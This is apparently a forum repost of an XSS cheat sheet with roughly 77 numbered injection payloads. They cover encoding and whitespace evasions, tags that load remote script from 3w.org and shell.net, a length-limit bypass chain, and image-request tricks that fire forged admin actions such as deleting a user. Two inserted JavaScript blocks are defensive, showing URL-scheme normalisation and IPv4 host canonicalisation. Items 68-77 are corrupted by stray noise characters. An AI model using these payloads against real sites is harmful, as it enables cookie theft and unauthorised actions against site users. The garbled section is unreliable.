It seems there is not much material about XSS on t00ls; I saw something good and copied it over, in case any of you want to bookmark it.
(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(2) IMG tag XSS using a JavaScript directive
<IMG SRC="javascript:alert('XSS');">
(3) IMG tag, no semicolon, no quotes
<IMG SRC=javascript:alert('XSS')>
(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>
(5) HTML entity encoding (semicolons required; the entities were decoded when this was pasted, so only the decoded form survives)
<IMG SRC=javascript:alert("XSS")>
(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>
(9) 7-digit zero-padded Unicode encoding, no semicolons (calculator)
<IMG SRC=jav..omitted..S')>
(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java..omitted..XSS')>
(11) Embedded tab, splitting "javascript"
<IMG SRC="jav	ascript:alert('XSS');">
(12) Embedded encoded tab, splitting "javascript"
<IMG SRC="jav&#x09;ascript:alert('XSS');">
(13) Embedded newline
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
(14) Embedded carriage return
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
(15) Multi-line injected JavaScript, the extreme case: every character of the payload sits on its own line (the line breaks were collapsed in this copy)
<IMG SRC="javascript:alert('XSS')">
(16) Working around an input length limit (all fragments must land on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>
12-7-1 T00LS - Powered by Discuz! Board
https://www.t00ls.net/viewthread ... table&tid=15267 2/6
(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
(18) Null character 2 (null bytes are basically ineffective in practice here, as there is nowhere to use them)
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=" javascript:alert('XSS');">
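The encoded and whitespace-split forms in items (4) to (14), (19) and (47) all collapse to the same scheme once the browser has processed them. The following is an added example, not part of the original post or of the cheat sheet it copies: it reproduces the two normalisation stages (HTML numeric character reference decoding, then the URL parser's whitespace stripping) in plain JavaScript and runs a typical regex deny-list and an allow-list check over constructed sample values taken from the items above. The function names and the sample list are this example's own.

```javascript
// Added example, not from the original post: why items (4)-(14), (19) and (47) get past a
// filter that greps the raw markup for "javascript:". The browser normalises an attribute
// value in two stages before it decides which scheme it is looking at, so the filter and
// the browser are comparing different strings.

// Stage 1: the HTML tokenizer decodes numeric character references inside attribute
// values. The trailing semicolon is optional and digits are consumed greedily, which is
// why item (10)'s semicolon-free form only works when the next character is not a
// (hex) digit. Named references are left out here; the cheat sheet does not use them.
function decodeNumericRefs(value) {
  return value.replace(/&#(?:[xX]([0-9a-fA-F]+)|([0-9]+));?/g, (whole, hex, dec) => {
    const cp = hex !== undefined ? parseInt(hex, 16) : parseInt(dec, 10);
    return cp > 0x10ffff ? whole : String.fromCodePoint(cp);
  });
}

// Stage 2: the URL parser strips leading and trailing C0 controls and spaces, then
// deletes every ASCII tab, LF and CR anywhere in the input, then lower-cases the scheme.
// That is what turns "jav<TAB>ascript:" and "\x01javascript:" back into "javascript:".
// Returns null when there is no scheme (a relative URL).
function schemeOf(url) {
  const trimmed = url.replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, '');
  const stripped = trimmed.replace(/[\t\n\r]/g, '');
  const m = /^([a-zA-Z][a-zA-Z0-9+.-]*):/.exec(stripped);
  return m ? m[1].toLowerCase() : null;
}

// The deny-list most people write: look for the forbidden scheme in the raw value.
function naiveFilterAllows(rawValue) {
  return !/javascript:/i.test(rawValue);
}

// Allow-list check that sees the value the way the browser will: decode, normalise,
// then accept only the schemes you actually want in a SRC or HREF.
function srcAllowed(rawValue) {
  const scheme = schemeOf(decodeNumericRefs(rawValue));
  return scheme === null || scheme === 'http' || scheme === 'https';
}

// Constructed test values: the text between the quotes of SRC="..." in the items above,
// paired with whether a SRC filter should let them through.
const SAMPLES = [
  ['http://3w.org/XSS/xss.js', true],                                  // a normal remote URL
  ["javascript:alert('XSS')", false],                                  // (3)
  ["JaVaScRiPt:alert('XSS')", false],                                  // (4)
  ["&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')", false], // (5)
  ["&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A;alert('XSS')", false],        // (10)
  ["jav\tascript:alert('XSS');", false],                               // (11) literal tab
  ["jav&#x09;ascript:alert('XSS');", false],                           // (12)
  ["jav&#x0A;ascript:alert('XSS');", false],                           // (13)
  ["jav&#x0D;ascript:alert('XSS');", false],                           // (14)
  ["&#1;javascript:alert('XSS')", false],                              // (47)
  ['vbscript:msgbox("XSS")', false],                                   // (40)
];

// Runs both filters over the samples; `naiveWrong` marks the values the deny-list gets
// wrong (it lets most of the encoded forms through and never looks for vbscript:).
function compareFilters(samples = SAMPLES) {
  return samples.map(([raw, shouldAllow]) => ({
    raw,
    naive: naiveFilterAllows(raw),
    hardened: srcAllowed(raw),
    naiveWrong: naiveFilterAllows(raw) !== shouldAllow,
    hardenedWrong: srcAllowed(raw) !== shouldAllow,
  }));
}
```

Run it with node and inspect compareFilters(). The point is the order of operations: decode and normalise first, then decide on the scheme from an allow-list. Matching the raw markup is a race the filter loses, because the browser gets the last word on what the bytes mean.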
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(21) Non-alpha-non-digit XSS, part 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
(22) Non-alpha-non-digit XSS, part 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(23) Extraneous open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>
(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
(25) No closing script tag 2, protocol-relative source
<SCRIPT SRC=//3w.org/XSS/xss.js>
(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"
(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <
(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
(29) Escaping JavaScript escapes
\";alert('XSS');//
(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
(31) INPUT image
<INPUT SRC="javascript:alert('XSS');">
(32) BODY image
<BODY BACKGROUND="javascript:alert('XSS')">
(33) BODY tag with an onload handler
<BODY ONLOAD=alert('XSS')>
(34) IMG DYNSRC
<IMG DYNSRC="javascript:alert('XSS')">
(35) IMG LOWSRC
<IMG LOWSRC="javascript:alert('XSS')">
(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">
(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">
(39) list-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
(40) IMG VBScript
<IMG SRC='vbscript:msgbox("XSS")'>
(41) META refresh with an extra URL parameter
<META HTTP-EQUIV="refresh" CONTENT="0;URL=http://;URL=javascript:alert('XSS');">
(42) IFRAME
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
(43) FRAME
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
(44) TABLE
<TABLE BACKGROUND="javascript:alert('XSS')">
(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(47) DIV background-image with extra characters inserted before the directive (decimal code points 1-32&34&39&160&8192-28&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">
(49) STYLE attribute with a split expression
<IMG STYLE="xss:expression(alert('XSS'))">
(50) Anonymous tag with a STYLE attribute (an open angle bracket followed by any letter)
<XSS STYLE="xss:expression(alert('XSS'))">
(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
(52) IMG STYLE with expression (only the tail of the payload survives in this copy)
exppression(alert("XSS"))'>
(53) STYLE background
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
(54) BASE
<BASE HREF="javascript:alert('XSS');//">
(55) EMBED tag: you can embed a Flash file that carries the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf"></EMBED>
(56) ActionScript inside the Flash file can smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);
(57) XML namespace; the .HTC file must be on the same server as your XSS vector
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>
(58) If your JS is filtered, you can put the JS code inside an image file and load that (the SRC is empty in this copy)
<SCRIPT SRC=""></SCRIPT>
(59) IMG embedded commands: the image is fetched by the victim's browser with their cookies, so the URL can trigger any GET-reachable action on their behalf
<IMG SRC="http://www.XXX.com/a.php?a=b">
(60) IMG embedded commands 2 (a.jpg is on your own server and redirects to the target action)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
(61) Bypassing symbol filters
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>
(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>
(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>
(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>
(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>
(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>
(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>
$ W+ C5 ]$ k. J' Z' p(68)URL绕行
5 C- ~4 i+ d2 L0 l" i# W<A HREF=”http://127.0.0.1/”>XSS</A>
1 e, A' u+ E" |! r3 E' ]- `1 x" m/ `(69)URL编码) `# ~. [# E- w1 M5 \# J+ g
<A HREF=”http://3w.org”>XSS</A>" C* ~3 |/ ~" H2 o
(70)IP十进制
& a# |6 M8 r. q<A HREF=”http://3232235521″>XSS</A>$ V# v7 x. D, c
(71)IP十六进制
) e' I: a9 r6 f, V" M2 k<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
# L* O% x; B. ?% J" |" V6 R, B(72)IP八进制
. E( l% M ]* E8 T<A HREF=”http://0300.0250.0000.0001″>XSS</A>! C6 N2 Z$ K& D3 s( S0 V1 _: X: ?
(73)混合编码
. g) j: |# m1 }$ M% h, {/ v<A HREF=”h) v$ Q9 _- r9 O) H7 ]
tt p://6 6.000146.0×7.147/”">XSS</A>
8 N7 v0 z( _/ x8 d1 t/ V(74)节省[http:]' N6 ~9 I5 u' E; p
<A HREF=”//www.google.com/”>XSS</A># [8 ~' V# m1 D
(75)节省[www]
( _' |+ V6 T: T5 Y- q8 G<A HREF=”http://google.com/”>XSS</A> D' U" E- H: f
(76)绝对点绝对DNS) ~% b4 O, r( F
<A HREF=”http://www.google.com./”>XSS</A>& v H6 E8 h4 O% v
(77)javascript链接
) [* B" P, x5 {8 E" g: Y/ M5 |<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
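The host tricks in (70) to (73) and (76) work because the browser's host parser accepts several spellings of the same IPv4 address and a trailing dot on a DNS name, while a deny-list usually compares the string. As an added example, not part of the original post: a canonicaliser that follows the WHATWG URL IPv4 parsing rules (a 0x prefix is hex, a leading 0 is octal, fewer than four parts are allowed and the last part fills the remaining bytes), plus a deny-list check that compares canonical hosts instead of raw strings. The functions and the sample deny-list are this example's own; the addresses are the cheat sheet's.

```javascript
// Added example, not from the original post: items (70)-(73) and (76) defeat a deny-list
// that compares host strings, because the host parser accepts an IPv4 address as one
// 32-bit decimal number, in hex, in octal, with fewer than four parts, or with a trailing
// dot. canonicalIPv4() follows the WHATWG URL IPv4 parser rules so that hosts can be
// compared on their 32-bit value rather than on spelling.

// One dotted part -> integer, or null if it is not a number in any accepted notation.
function parseIPv4Part(part) {
  let radix = 10;
  if (/^0[xX]/.test(part)) { radix = 16; part = part.slice(2); }
  else if (part.length > 1 && part[0] === '0') { radix = 8; part = part.slice(1); }
  if (part === '') return radix === 10 ? null : 0;      // "0x" alone is 0; "" is not a number
  const digits = { 10: /^[0-9]+$/, 16: /^[0-9a-fA-F]+$/, 8: /^[0-7]+$/ }[radix];
  return digits.test(part) ? parseInt(part, radix) : null;
}

// Canonical dotted-decimal form of an IPv4 literal, or null when `host` is not a valid
// IPv4 literal (a real hostname, or a literal the URL parser rejects as out of range).
function canonicalIPv4(host) {
  const parts = host.split('.');
  if (parts.length > 1 && parts[parts.length - 1] === '') parts.pop();   // "1.2.3.4."
  if (parts.length < 1 || parts.length > 4) return null;
  const nums = parts.map(parseIPv4Part);
  if (nums.some(n => n === null)) return null;
  for (let i = 0; i < nums.length - 1; i++) if (nums[i] > 255) return null;
  const last = nums[nums.length - 1];
  if (last >= 256 ** (5 - nums.length)) return null;   // last part must fit the remaining bytes
  let value = 0;
  for (let i = 0; i < nums.length - 1; i++) value = value * 256 + nums[i];
  value = value * 256 ** (5 - nums.length) + last;
  return [value >>> 24, (value >>> 16) & 255, (value >>> 8) & 255, value & 255].join('.');
}

// Canonical key for a host: the dotted-decimal value for IPv4 literals, otherwise the
// lower-cased name without the absolute-DNS trailing dot of item (76).
function canonicalHost(host) {
  return canonicalIPv4(host) || host.toLowerCase().replace(/\.$/, '');
}

// Deny-list that compares canonical hosts. `denied` is a constructed list of
// dotted-decimal IPs and plain hostnames.
function hostDenied(host, denied) {
  const target = canonicalHost(host);
  return denied.some(d => canonicalHost(d) === target);
}
```

Node's own WHATWG URL implementation applies the same algorithm, so new URL('http://3232235521/').hostname already yields 192.168.0.1; the practical rule is to parse the URL and compare the parsed host, never the string the user typed.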
Original source: http://fuzzexp.org/u/0day/?p=14